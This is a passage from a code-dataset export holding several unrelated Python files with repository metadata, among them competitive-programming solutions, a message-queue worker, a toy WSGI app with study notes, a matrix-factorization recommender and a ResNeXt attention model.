        lambda ch: ch in '!@#$%^&*()-+',
    )
    missing = sum(1 for check in checks
                  if not any(check(ch) for ch in password))
    # Even with every class present, the password must reach length 6.
    return max(missing, 6 - n)
if __name__ == '__main__':
    # HackerRank harness: the answer is written to the file named by
    # the OUTPUT_PATH environment variable.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())
    password = input()
    answer = minimumNumber(n, password)
    fptr.write(str(answer) + '\n')
    fptr.close()
| [
"[email protected]"
]
| |
0250af5de2c470cdfe5b35e79ad11ff9fecf0505 | b3aa3d77836fa8f05b54d68e7bd6bff19dced90d | /Atcoder/166/F.py | cebe95a2befd384d575177108224c95f438c7ef8 | []
| no_license | anoubhav/Codeforces-Atcoder-Codechef-solutions | 660c5b78723791bc33b1d51977bf11ebe6dfe4c1 | aeebcae332af64aba49f52261d11aa6996f33b1c | refs/heads/master | 2022-12-08T14:02:49.574928 | 2020-08-29T14:18:30 | 2020-08-29T14:18:30 | 255,004,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | n, a, b, c = list(map(int, input().split()))
slist = []
d = {'A': a, 'B':b, 'C':c}
soln = []
prev = None
for i in range(n):
s = input()
# corner case
if prev:
if prev[0] in s:
d[prev[0]] += 1
d[prev[1]] -= 1
soln.append(prev[0])
else:
d[prev[1]] += 1
d[prev[0]] -= 1
soln.append(prev[1])
prev = None
# corner case
if d[s[0]] ==1 and d[s[1]] == 1:
prev = s
# greedy
elif d[s[0]] >= d[s[1]]:
d[s[0]] -= 1
d[s[1]] += 1
soln.append(s[1])
elif d[s[0]] < d[s[1]]:
d[s[1]] -= 1
d[s[0]] += 1
soln.append(s[0])
if d['A'] < 0 or d['B'] < 0 or d['C'] < 0:
print('No')
exit()
break
print('Yes')
print('\n'.join(soln))
| [
"[email protected]"
]
| |
3bc0fa150804ea42ba257f13005f8613c6d86e46 | d3dc206446cffc919a7b3fb0838ca0ef14043e04 | /redditbot/worker.py | 3af98330efac68cb5f8d935bf1d5e72af2b2adfd | []
| no_license | gtmanfred/redditbot | 70ff2e2d1a63a4d272db93301ebb4f21acf16dae | 05d8f24620c9a3847c7e0c37ae8015e048af312e | refs/heads/master | 2020-04-18T14:56:02.289674 | 2015-10-19T01:22:40 | 2015-10-19T01:22:40 | 42,025,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | from kombu.connection import BrokerConnection
from kombu.mixins import ConsumerMixin
from blinker import signal
import logging
from redditbot.queues import task_queues
logger = logging.getLogger(__name__)
class Worker(ConsumerMixin):
    """Kombu consumer that forwards reddit posts to their configured channels."""

    def __init__(self, connection, config):
        self.connection = BrokerConnection(connection)
        self.config = config

    def get_consumers(self, Consumer, channel):
        # Single consumer over all task queues, dispatching to process_task.
        consumer = Consumer(queues=task_queues,
                            accept=['pickle', 'json'],
                            callbacks=[self.process_task])
        return [consumer]

    def process_task(self, body, message):
        post = body['post']
        logger.info('Got task: %s', post.id)
        try:
            logger.info(
                'New Post for %s: %s',
                post.subreddit.display_name, str(post)
            )
            # Emit the post on every channel mapped to its subreddit.
            channels = self.config['subreddits'][post.subreddit.display_name]
            for channel in channels:
                signal('send-message').send(channel, message=post)
            # Acknowledge only after successful dispatch.
            message.ack()
        except Exception as exc:
            logger.error('Exception Raised: %r', exc)
| [
"[email protected]"
]
| |
1287031215a5c2e62234091f3722019c1952123e | 3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d | /第三阶段笔记/x.py | 9a4ea86bafae287fe00bb41414f17d9df388718a | []
| no_license | qianpeng-shen/Study_notes | 6f77f21a53266476c3c81c9cf4762b2efbf821fa | 28fb9a1434899efc2d817ae47e94c31e40723d9c | refs/heads/master | 2021-08-16T19:12:57.926127 | 2021-07-06T03:22:05 | 2021-07-06T03:22:05 | 181,856,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | import time
HTML_ROOT_DIR="./static"
PYTHON_DIR="./wsgiPy"
class Application(object):
    """Minimal WSGI-style application: serves files under /static and routes
    every other path through a (url, handler) table."""

    def __init__(self, urls):
        # urls: sequence of (path, handler) pairs.
        self.urls = urls

    def __call__(self, env, set_headers):
        # BUGFIX: the environ key is 'PATH_INFO' (was misspelled 'PARH_INFO',
        # so every request fell back to '/').
        path = env.get('PATH_INFO', '/')
        # BUGFIX: request paths start with '/', so test for '/static'
        # (the original 'static' prefix could never match).
        if path.startswith('/static'):
            file_name = path[7:]  # portion after '/static'
            try:
                # BUGFIX: open the requested file under the static root; the
                # original opened the directory itself and always failed.
                fd = open(HTML_ROOT_DIR + file_name, 'rb')
            except IOError:
                status = '404 not fount'
                headers = []
                set_headers(status, headers)
                return "<h1>===没找到===<h1>"
            else:
                file_data = fd.read()
                fd.close()
                status = '200 OK'
                headers = []
                set_headers(status, headers)
                return file_data.decode('utf-8')
        else:
            # Exact-match dispatch through the routing table.
            for url, handler in self.urls:
                if path == url:
                    return handler(env, set_headers)
            status = "404 not found"
            headers = []
            set_headers(status, headers)
            return "sorry url not found"
# BUGFIX: the original defined "def show _time" (invalid syntax -- a space in
# the identifier) three times in a row, and never defined the say_hello /
# say_bye / yang handlers that `urls` references.  All three broken copies had
# identical bodies, so each route keeps that behavior (respond 200 and return
# the current time string).
# NOTE(review): say_hello / say_bye / yang presumably should return their own
# messages -- confirm the intended responses.

def show_time(env, set_headers):
    """Handler for /time."""
    status = "200 OK"
    headers = []
    set_headers(status, headers)
    return time.ctime()

def say_hello(env, set_headers):
    """Handler for /hello."""
    status = "200 OK"
    headers = []
    set_headers(status, headers)
    return time.ctime()

def say_bye(env, set_headers):
    """Handler for /bye."""
    status = "200 OK"
    headers = []
    set_headers(status, headers)
    return time.ctime()

def yang(env, set_headers):
    """Handler for /xiaoyang."""
    status = "200 OK"
    headers = []
    set_headers(status, headers)
    return time.ctime()

urls = [
    ('/time', show_time),
    ('/hello', say_hello),
    ('/bye', say_bye),
    ("/xiaoyang", yang)
]
app = Application(urls)
| [
"[email protected]"
]
| |
09dc93bf160fae79ae292d82e8e5f44287276cfe | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_path.py | 628e708d4edce2b96dbb415798f282ec876d858b | []
| no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,597 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasPath(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    # openapi_types: attribute name -> OpenAPI type string.
    # attribute_map: attribute name -> JSON key in the API definition.
    openapi_types = {
        'methods': 'list[WaasMethod]',
        'path': 'str'
    }

    attribute_map = {
        'methods': 'methods',
        'path': 'path'
    }

    def __init__(self, methods=None, path=None, local_vars_configuration=None):  # noqa: E501
        """WaasPath - a model defined in OpenAPI"""  # noqa: E501
        self.local_vars_configuration = (
            local_vars_configuration
            if local_vars_configuration is not None
            else Configuration.get_default_copy()
        )

        self._methods = None
        self._path = None
        self.discriminator = None

        if methods is not None:
            self.methods = methods
        if path is not None:
            self.path = path

    @property
    def methods(self):
        """Gets the methods of this WaasPath.  # noqa: E501

        Supported operations for the path (e.g., PUT, GET, etc.).  # noqa: E501

        :return: The methods of this WaasPath.  # noqa: E501
        :rtype: list[WaasMethod]
        """
        return self._methods

    @methods.setter
    def methods(self, methods):
        """Sets the methods of this WaasPath.

        Supported operations for the path (e.g., PUT, GET, etc.).  # noqa: E501

        :param methods: The methods of this WaasPath.  # noqa: E501
        :type methods: list[WaasMethod]
        """
        self._methods = methods

    @property
    def path(self):
        """Gets the path of this WaasPath.  # noqa: E501

        Relative path to an endpoint such as \\\"/pet/{petId}\\\".  # noqa: E501

        :return: The path of this WaasPath.  # noqa: E501
        :rtype: str
        """
        return self._path

    @path.setter
    def path(self, path):
        """Sets the path of this WaasPath.

        Relative path to an endpoint such as \\\"/pet/{petId}\\\".  # noqa: E501

        :param path: The path of this WaasPath.  # noqa: E501
        :type path: str
        """
        self._path = path

    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        def convert(value):
            # Nested models expose to_dict(); forward `serialize` when the
            # nested signature accepts it.
            if not hasattr(value, "to_dict"):
                return value
            if len(getfullargspec(value.to_dict).args) == 1:
                return value.to_dict()
            return value.to_dict(serialize)

        result = {}
        for name in self.openapi_types:
            value = getattr(self, name)
            key = self.attribute_map.get(name, name) if serialize else name
            if isinstance(value, list):
                result[key] = [convert(item) for item in value]
            elif isinstance(value, dict):
                result[key] = {k: convert(v) for k, v in value.items()}
            else:
                result[key] = convert(value)
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return isinstance(other, WaasPath) and self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not isinstance(other, WaasPath) or self.to_dict() != other.to_dict()
| [
"[email protected]"
]
| |
db766e679ad5d5b29b11e5227f416641d4615582 | 8a39a9092e468ae0b0f1cbaa120ec9cb073ea99a | /flaskapp/bin/wheel | 6cf1bd3c2fac09220ced09d1f4faf7538fb92369 | []
| no_license | UPstartDeveloper/Mad_Libs | 717d840dfaebf837a0ec8b7d41360557bdd28ba7 | b103051afdc38693e07deb6fb66b3b992b032a3b | refs/heads/master | 2020-07-14T07:18:58.575014 | 2019-09-09T19:06:50 | 2019-09-09T19:06:50 | 205,271,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/Users/zainraza/Documents/dev/courses/MadLibs/flaskapp/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
    # Normalize argv[0]: strip the setuptools '-script.py(w)'/'.exe' wrapper
    # suffix so wheel's CLI reports the plain command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"[email protected]"
]
| ||
a536bdcbf7d2e262cdcd57fb7576a6c706c7c063 | fcbf910c46991955159a11a34573d3bbb2c8bb90 | /test/serial/mf_mapping.py | fa9f5612f9e55757f82782376fecec5ea9607cbd | [
"BSD-2-Clause",
"BSD-3-Clause"
]
| permissive | xunzhang/paracel | 59114aa63e46b844e56e1089dae633e55150875a | 553598a1f4c942c80157adfc23c2cd3fe0dab333 | refs/heads/develop | 2020-05-19T08:57:50.643425 | 2015-06-14T16:44:49 | 2015-06-14T16:44:49 | 14,230,290 | 13 | 3 | null | 2014-12-09T16:24:44 | 2013-11-08T10:37:14 | C++ | UTF-8 | Python | false | false | 3,221 | py | #! /usr/bin/env python
#
# Matrix factorization with bias
#
import numpy as np
class mf():
    """Biased matrix factorization recommender trained with plain SGD.

    Learns user/item latent factors plus user/item bias terms on top of the
    global mean rating, minimizing squared error with L2 regularization.
    """

    def __init__(self, k = 100, rounds = 10, alpha = 0.001, beta = 0.01, train_fn = '', pred_fn = '', output = ''):
        # k: latent dimension; rounds: SGD epochs;
        # alpha: learning rate; beta: L2 regularization strength.
        self.k = k
        self.rounds = rounds
        self.alpha = alpha
        self.beta = beta
        self.train_fn = train_fn
        self.pred_fn = pred_fn
        self.output = output
        self.usr_dct = {}          # raw user id -> dense index
        self.item_dct = {}         # raw item id -> dense index
        self.rating_graph = {}     # user index -> list of (item index, rating)
        self.rating_sz = 0
        self.miu = 0.              # global mean rating
        self.rmse = 0.
        self.p = None              # user factors, shape (n_users, k)
        self.q = None              # item factors, shape (n_items, k)
        self.usr_bias = None
        self.item_bias = None

    def load(self):
        """Read 'uid,iid,rating' lines from train_fn and build the rating graph."""
        # Robustness: 'with' closes the file even if a line fails to parse.
        with open(self.train_fn) as f:
            for line in f:
                uid, iid, rating = line.strip('\n').split(',')
                rating = float(rating)
                if uid not in self.usr_dct:
                    self.usr_dct[uid] = len(self.usr_dct)
                if iid not in self.item_dct:
                    self.item_dct[iid] = len(self.item_dct)
                self.rating_graph.setdefault(self.usr_dct[uid], []).append((self.item_dct[iid], rating))
                self.rating_sz += 1
                self.miu += rating
        self.miu /= self.rating_sz

    def estimate(self, i, j):
        """Predicted rating of user index i for item index j."""
        return self.miu + self.usr_bias[i] + self.item_bias[j] + np.dot(self.p[i, :], self.q[j, :])

    def cal_rmse(self):
        """Root-mean-square error over all observed ratings."""
        import math
        self.rmse = 0.
        # Py3 port: dict.iteritems() no longer exists; use items().
        for u_indx, pair in self.rating_graph.items():
            for i_indx, rating in pair:
                self.rmse += (rating - self.estimate(u_indx, i_indx)) ** 2
        return math.sqrt(self.rmse / self.rating_sz)

    def learning(self):
        """Run SGD over all observed ratings for self.rounds epochs."""
        self.p = np.random.rand(len(self.usr_dct), self.k)
        self.q = np.random.rand(len(self.item_dct), self.k)
        self.usr_bias = np.random.rand(len(self.usr_dct))
        self.item_bias = np.random.rand(len(self.item_dct))
        # Py3 port: xrange -> range.
        for rd in range(self.rounds):
            for u_indx, pair in self.rating_graph.items():
                for i_indx, rating in pair:
                    e = rating - self.estimate(u_indx, i_indx)
                    # compute delta (gradient of squared error + L2 penalty)
                    delta_p = self.alpha * (2 * e * self.q[i_indx, :] - self.beta * self.p[u_indx, :])
                    delta_q = self.alpha * (2 * e * self.p[u_indx, :] - self.beta * self.q[i_indx, :])
                    delta_ubias = self.alpha * (2 * e - self.beta * self.usr_bias[u_indx])
                    delta_ibias = self.alpha * (2 * e - self.beta * self.item_bias[i_indx])
                    # update with delta
                    self.p[u_indx, :] += delta_p
                    self.q[i_indx, :] += delta_q
                    self.usr_bias[u_indx] += delta_ubias
                    self.item_bias[i_indx] += delta_ibias

    def solve(self):
        self.load()
        self.learning()

    def predict_rating(self):
        """Write 'uid,iid,predicted' lines for every pair listed in pred_fn."""
        with open(self.pred_fn) as f1, open(self.output, 'w') as f2:
            for line in f1:
                uid, iid = line.strip('\n').split(',')
                u_indx = self.usr_dct[uid]
                i_indx = self.item_dct[iid]
                pred_rating = self.estimate(u_indx, i_indx)
                f2.write('%s,%s,%s\n' % (uid, iid, pred_rating))
if __name__ == '__main__':
    # Smoke-test driver (paths are site-specific to the original cluster).
    mf_solver = mf(k = 80, rounds = 3, alpha = 0.005, beta = 0.02, train_fn = '/mfs/user/wuhong/paracel/test/serial/training.csv', pred_fn = '/mfs/alg/Rec_Competition/predict.csv', output = '/mfs/user/wuhong/paracel/test/serial/mf_result')
    mf_solver.solve()
    # Bug fix: print is a function in Python 3 (the statement form is a SyntaxError).
    print(mf_solver.cal_rmse())
    mf_solver.predict_rating()
| [
"[email protected]"
]
| |
cb02f43cde2d805ac8b14cabc69256dfad851d6a | fec36e7493a78575cd0320bf31c5080649863a06 | /src/views/feature_value/list.py | 2294b96b083b882991877221f5e144dc233b810e | []
| no_license | teimurjan/eye8-backend | 6f44e830dd17dcac8b23acc3b66b9918357f643b | bf0a4c894a5b3770fada269d8b4d7d72367ab1ba | refs/heads/master | 2023-06-30T01:34:38.358903 | 2021-06-23T10:06:29 | 2021-06-23T10:06:29 | 273,144,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
    """List (GET) and create (POST) feature values, with optional pagination."""

    def __init__(
        self,
        validator: CreateFeatureValueDataValidator,
        service: FeatureValueService,
        serializer_cls: Type[FeatureValueSerializer],
    ):
        super().__init__(validator)
        self._service = service
        self._serializer_cls = serializer_cls

    def get(self, request):
        pagination = self._get_pagination_data(request)
        if pagination:
            # Paginated listing: fetch one page and build the meta envelope.
            feature_values, count = self._service.get_all(
                offset=pagination["offset"], limit=pagination["limit"]
            )
            meta = self._get_meta(count, pagination["page"], pagination["limit"])
        else:
            feature_values, _ = self._service.get_all()
            meta = None

        # raw_intl=1 returns untranslated intl fields.
        language = None if request.args.get("raw_intl") == "1" else request.language
        data = [
            self._serializer_cls(feature_value)
            .in_language(language)
            .with_serialized_feature_type()
            .serialize()
            for feature_value in feature_values
        ]
        return {"data": data, "meta": meta}, OK_CODE

    def post(self, request):
        try:
            valid_data = self._validate(request.get_json())
            feature_value = self._service.create(valid_data, user=request.user)
            serialized = (
                self._serializer_cls(feature_value)
                .with_serialized_feature_type()
                .serialize()
            )
            return {"data": serialized}, OK_CODE
        except self._service.FeatureTypeInvalid:
            raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
| [
"[email protected]"
]
| |
54fa9a542b276fcf3b2261c362e3d446b891570a | ce9c2603167e1b30b222afd5206ac7fa31d19a77 | /imctools/io/errors.py | dfd219570e7d15482e270e2b063e25a27abc5522 | [
"MIT"
]
| permissive | BodenmillerGroup/imctools | 6d07036045a6361e17811d8f675eab01f34ffade | 361e49f3e0de4cf9c58c3b6d1024feacd2855d98 | refs/heads/master | 2022-05-01T23:29:49.302686 | 2022-03-31T09:58:01 | 2022-03-31T09:58:01 | 68,657,395 | 21 | 14 | MIT | 2022-03-31T09:58:02 | 2016-09-20T00:16:24 | Python | UTF-8 | Python | false | false | 75 | py | class AcquisitionError(Exception):
"""An error with IMC acquisition"""
| [
"[email protected]"
]
| |
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /2.Jump_to_python/Python07.py | 99deebb9aeec73d60845d030c9ca5481a5b33cec | []
| no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # 모듈화 + 패키지
# + importing modules, placing test code, importing modules, using packages
# Module
# A file that gathers functions, variables, or classes.
# => a file with the .py extension
# mod.py, __init__.py, p1.py, p2.py, ...
# import module_name
# module_name.function  -- to avoid writing the module name -> from module_name import function
# from mod1 import *  -> * means (everything)
# Targets of modularization => variables, functions, classes <= these can be pulled in and used as your own
# Package
# A directory grouping similar functionality: utilities, networking, GUI, etc.
# The __init__.py inside a package folder is required everywhere on Python <= 3.3 for backward compatibility.
# Also, __init__.py represents the package itself.
#-------------------------------
# from package.package....module \ import variables, functions, classes (list what you need)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from package.package \ import variable, function, class
# Imports from the __init__.py inside the last package (directory) on the path
from a.b import PI2 as pi2 # PI2 -> pi2 renamed
print(pi2)
# A package name must never contain a dot!!
# A module name must never contain a dot!!
from a import PI3
print(PI3)
# Alias => when a name is too long, or you want to use it under a changed name
# original_name as alias
from a import PI3 as pi
print(pi)
# Too many modules to bring in; want them all at once => *
# For backward compatibility use:
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# When using `import` alone
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# Importing a module is effectively executing it -> it must be loaded into memory,
# so for modules you wrote yourself, unintended code may run on import.
# => Code written only for testing must not actually run when the module is imported.
# => This needs handling => handled with __name__
# A module that uses __name__ sees "__main__" when run directly,
# and the "module name" when used as a module (i.e., imported by another module).
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__) | [
"[email protected]"
]
| |
86157b173385f4d53dbc01fa8e2417b7ee496c95 | f952a4583b0b751a1d5e2c5c453b16b1eb790ce5 | /networks/resnext_50_share_attention.py | db6b84562b8195c8267425a8f726e74a486801de | []
| no_license | dotpyu/Concept-Sharing-Network | 18b636a556cbc2dff887ac3c06110c58064393c8 | 2c85b312ef7d93a79498b5b3a8bc7b4d008e7b94 | refs/heads/master | 2022-04-11T02:07:16.387275 | 2020-03-30T20:44:36 | 2020-03-30T20:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,668 | py |
import torch
import torch.nn as nn
from torch.autograd import Variable
from functools import reduce
import pdb
from collections import OrderedDict
import torch.nn.functional as f
class LambdaBase(nn.Sequential):
    # Base for torch7->PyTorch converted "Lambda" containers: stores a plain
    # python function plus (optionally) child modules applied to the input.
    def __init__(self, fn, *args):
        super(LambdaBase, self).__init__(*args)
        self.lambda_func = fn
    def forward_prepare(self, input):
        # Run every child module on the input; with no children, return the
        # input itself unchanged.
        output = []
        for module in self._modules.values():
            output.append(module(input))
        return output if output else input
class Lambda(LambdaBase):
    # Applies lambda_func to the prepared input (single value or list).
    def forward(self, input):
        return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
    # torch7 ConcatTable equivalent: maps lambda_func over each child's output.
    def forward(self, input):
        return list(map(self.lambda_func,self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
    # torch7 CAddTable-style reduce: folds lambda_func across child outputs.
    def forward(self, input):
        return reduce(self.lambda_func,self.forward_prepare(input))
def _resnext_bottleneck(in_ch, width, out_ch, stride, downsample):
    """One ResNeXt bottleneck block (cardinality 32).

    Mirrors the torch7-converted structure: a LambdaMap feeds the input to
    both the residual branch and the shortcut, a LambdaReduce sums the two
    results, then a ReLU is applied.
    """
    residual = nn.Sequential(  # Sequential,
        nn.Sequential(  # Sequential,
            nn.Conv2d(in_ch, width, (1, 1), (1, 1), (0, 0), 1, 1, bias=False),
            nn.BatchNorm2d(width),
            nn.ReLU(),
            # Grouped 3x3 convolution (32 groups) carries the stride.
            nn.Conv2d(width, width, (3, 3), (stride, stride), (1, 1), 1, 32, bias=False),
            nn.BatchNorm2d(width),
            nn.ReLU(),
        ),
        nn.Conv2d(width, out_ch, (1, 1), (1, 1), (0, 0), 1, 1, bias=False),
        nn.BatchNorm2d(out_ch),
    )
    if downsample:
        # Projection shortcut: 1x1 conv matching channels / spatial size.
        shortcut = nn.Sequential(  # Sequential,
            nn.Conv2d(in_ch, out_ch, (1, 1), (stride, stride), (0, 0), 1, 1, bias=False),
            nn.BatchNorm2d(out_ch),
        )
    else:
        shortcut = Lambda(lambda x: x)  # Identity,
    return nn.Sequential(  # Sequential,
        LambdaMap(lambda x: x, residual, shortcut),  # ConcatTable,
        LambdaReduce(lambda x, y: x + y),  # CAddTable,
        nn.ReLU(),
    )


def _resnext_stage(in_ch, width, out_ch, n_blocks, stride):
    """A stage of n_blocks bottlenecks; only the first block downsamples."""
    blocks = [_resnext_bottleneck(in_ch, width, out_ch, stride, True)]
    blocks += [_resnext_bottleneck(out_ch, width, out_ch, 1, False)
               for _ in range(n_blocks - 1)]
    return nn.Sequential(*blocks)


# ResNeXt-50 (32x4d) feature extractor, built programmatically instead of the
# original 300+ line generated literal.  Child-module nesting and indices are
# identical to the generated version, so state_dict keys are unchanged and
# pretrained checkpoints keep loading.  The trailing AvgPool/View of the stock
# network stays omitted, exactly as in the generated code where those two
# lines were commented out.
resnext_50_32x4d = nn.Sequential(  # Sequential,
    nn.Conv2d(3, 64, (7, 7), (2, 2), (3, 3), 1, 1, bias=False),
    nn.BatchNorm2d(64),
    nn.ReLU(),
    nn.MaxPool2d((3, 3), (2, 2), (1, 1)),
    _resnext_stage(64, 128, 256, 3, 1),
    _resnext_stage(256, 256, 512, 4, 2),
    _resnext_stage(512, 512, 1024, 6, 2),
    _resnext_stage(1024, 1024, 2048, 3, 2),
)
class resnext_car_multitask(nn.Module):
    """Multi-task fine-grained car attribute classifier on a ResNeXt-50 trunk.

    For each of `class_num` binary tasks, an attention head (shared across
    tasks via `att_index`) produces soft spatial weights over the final
    feature map; the attention-pooled 2048-d feature goes through a per-task
    binary linear classifier.
    """

    def __init__(self, cropsize=224, resnext_model=None, class_num=1, test=False, fc_num = 8, att_num = 9):
        super(resnext_car_multitask, self).__init__()
        self.resnext_car_multitask = resnext_50_32x4d
        self.classifier = []
        self.att = []
        self.att_k = []
        self.class_num = class_num
        self.relu = nn.ReLU()
        self.drop = nn.Dropout(p=0.5)
        self.upsample = nn.Upsample(scale_factor=2)
        self.ave_pool = nn.AvgPool2d((7, 7), (1, 1))
        self.ave_pool2 = nn.AvgPool2d((2, 2), (1, 1))
        self.att_num = att_num
        self.fc_num = fc_num
        self.max_pool = nn.MaxPool2d((7, 7), (1, 1))
        # Feature width of the ResNeXt-50 trunk output.
        # (Removed a dead `embed_size = 66` that was immediately overwritten.)
        embed_size = 2048
        # Number of extra learned "key" logits appended to each attention map.
        k = 5
        self.soft = nn.Softmax(2)
        self.cropsize = cropsize
        # Re-initialize trunk parameters; the att/classifier modules are
        # created afterwards so they keep their own (default/explicit) init.
        for params in self.parameters():
            if params.ndimension() > 1:
                torch.nn.init.xavier_uniform(params)
            else:
                torch.nn.init.normal(params)
        for i in range(self.att_num):
            self.att.append(nn.Conv2d(1024, 1, (3, 3), (2, 2), (1, 1), 1, 1, bias=False))
            self.att_k.append(nn.Parameter(torch.zeros(1, 1, k), requires_grad=True))
            # Zero conv weights -> initially uniform attention.
            self.att[i].weight.data.fill_(0)
        for i in range(self.class_num):
            self.classifier.append(nn.Linear(embed_size, 2))
        self.classifier = nn.ModuleList(self.classifier)
        self.att_k = nn.ParameterList(self.att_k)
        self.att = nn.ModuleList(self.att)
        # (Removed an unreachable `if False:` checkpoint-loading block;
        # checkpoint loading is handled by resnext50_fg_car in this file.)

    def forward(self, x, att_index, fc_index):
        """x: image batch; att_index[i]: which attention head task i uses;
        fc_index: accepted but unused here (kept for interface compatibility).
        Returns (list of per-task logits, empty list)."""
        x = x.view(-1, 3, self.cropsize, self.cropsize)
        # Split the trunk: all but the last stage -> x1 (1024 ch),
        # last stage -> x (2048 ch).
        module1 = nn.Sequential(*list(self.resnext_car_multitask.children())[:-1])
        module2 = nn.Sequential(*list(self.resnext_car_multitask.children())[-1])
        x1 = module1(x)
        x = module2(x1)
        # L2-normalize each channel across spatial positions before the
        # attention convolution.
        x_norm = x1.view(x1.size(0), x1.size(1), -1)
        x_norm = f.normalize(x_norm, p=2, dim=2)
        x_norm = x_norm.view(x1.size(0), x1.size(1), x1.size(2), x1.size(3))
        outputs = []
        outputs2 = []
        x = x.view(x.size(0), x.size(1), -1)
        for i in range(self.class_num):
            # Attention logits over spatial positions (the stride-2 conv
            # brings the 1024-ch map to the 2048-ch map's resolution).
            att0 = self.att[att_index[i]](x_norm)
            height = att0.size(2)
            att0 = att0.repeat(1, x.size(1), 1, 1)
            att0 = att0.view(x.size(0), x.size(1), -1)
            # Append the k learned "background" logits, softmax jointly, then
            # keep only the spatial part, so the weights may sum to < 1.
            att0_k = self.att_k[att_index[i]]
            att0_k = att0_k.repeat(x.size(0), x.size(1), 1)
            att0 = torch.cat((att0, att0_k), 2)
            att0 = self.soft(att0)
            # NOTE(review): height*height assumes a square feature map — TODO confirm.
            att0 = att0[:, :, 0:(height * height)]
            # Attention-weighted sum over spatial positions -> (B, 2048).
            x0 = torch.sum(torch.mul(x, att0), 2)
            outputs.append(self.classifier[i](self.drop(x0)))
        return outputs, outputs2
def resnext50_fg_car(pretrained=False, model_dir='', class_num=1, test=False, **kwargs):
    # Factory: build a resnext_car_multitask model, optionally initialising it
    # from a checkpoint at model_dir.
    #   test=False: model_dir holds an ImageNet trunk checkpoint; its keys are
    #               re-prefixed onto the trunk submodule.
    #   test=True:  model_dir holds a previously trained full model.
    if pretrained:
        # model_dict = torch.load(model_dir)
        model = resnext_car_multitask(resnext_model=model_dir, class_num=class_num, test=test, **kwargs)
        params = torch.load(model_dir)
        keys = params.keys()
        keys1 = list(keys)
        if not test:
            print('load imagent model')
            # Drop the last two checkpoint entries — presumably the ImageNet
            # FC weight/bias, which this model does not use. TODO confirm.
            params.pop(keys1[-1])
            params.pop(keys1[-2])
            new_state_dict = OrderedDict()
            for k,v in params.items():
                # Re-prefix trunk keys to match the submodule attribute name.
                name = 'resnext_car_multitask.'+k
                new_state_dict[name] = v
            state = model.state_dict()
            state.update(new_state_dict)
            model.load_state_dict(state)
        else:
            print('load test model')
            new_state_dict = OrderedDict()
            for k,v in params.items():
                # Strip the first 7 characters — presumably the 'module.'
                # prefix added by DataParallel. TODO confirm.
                name = k[7:]
                print(name)
                new_state_dict[name] = v
            state = model.state_dict()
            state.update(new_state_dict)
            model.load_state_dict(state)
    else:
        model = resnext_car_multitask(resnext_model=None, class_num=class_num, test=test, **kwargs)
    return model
| [
"[email protected]"
]
| |
94d03e9f0f7b8cec3c47cc368593566e2ada6fad | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_magnesia.py | 9193757fb3463cb627d30a16deadeb1b54c32ebb | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py |
#calss header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
